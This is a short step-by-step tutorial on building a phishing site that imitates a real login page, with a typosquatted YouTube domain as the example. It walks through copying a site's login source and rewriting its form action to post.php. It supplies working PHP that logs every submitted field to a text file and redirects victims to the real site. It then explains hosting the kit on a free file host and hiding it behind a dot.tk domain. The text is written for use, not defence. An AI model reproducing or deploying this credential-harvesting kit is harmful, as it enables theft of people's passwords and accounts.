What is a phishing site?
A phishing site is a duplicate of another website that you sign in to. It would look exactly the same and act exactly the same
as the original site, but the information you log in with will be sent to the person who runs that site. So if I wanted to get people's
Youtube password, I would name the site something close to youtube.tk and make it look exactly like the youtube login page.
Then i would give someone the link and when they sign in, all the information that they typed will be sent to me. Example: youtue.tk.
step 1:
- Go to the login/registration page of a website you want to copy.
- Right click on a free space on the site and a drop down menu will display
- Click, view page source
- Copy and paste the page source in to notepad
step 2:
- Once the whole source is in notepad, scroll to the bottom and press Ctrl+F
- A find window will appear, type in Action and press enter
- It will move you to any place that has "Action"
- When ever you see action around something like this: action="https://www.website.com/something" method="post" replace the link in the quotes,
it would be website.com/something, with Post.php. So it would be: action="post.php" method="post"
- There can be more than one phrase like this, so after you change the link to post.php keep doing the find operation to find any others.
- Save this as index.htm and close it.
step 3:
- Open a new notepad and paste this inside:
<?php
header ('Location: http://www.website.com/something');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Step 4:
- Go to www.badwaresite.www and sign up
- When you are signed into ripway, click "my files" and then click upload files. Upload index.htm first and then upload post.php
- When it is done uploading, go to my files and there should be a link inder index.htm
- That is the link to your phishing site, click it and see how it looks
- When people sign into/up for the website, any information that they enter will be displayed as a new text file when you sign back into ripway and go into my files
Step 5:
- go to dot.tk
- copy and paste your phishing url into where it says "enter your url here"
- When you do that, a page will appear guiding you to change the link to whatyouwant.tk and when people go there they will be going to your phishing website.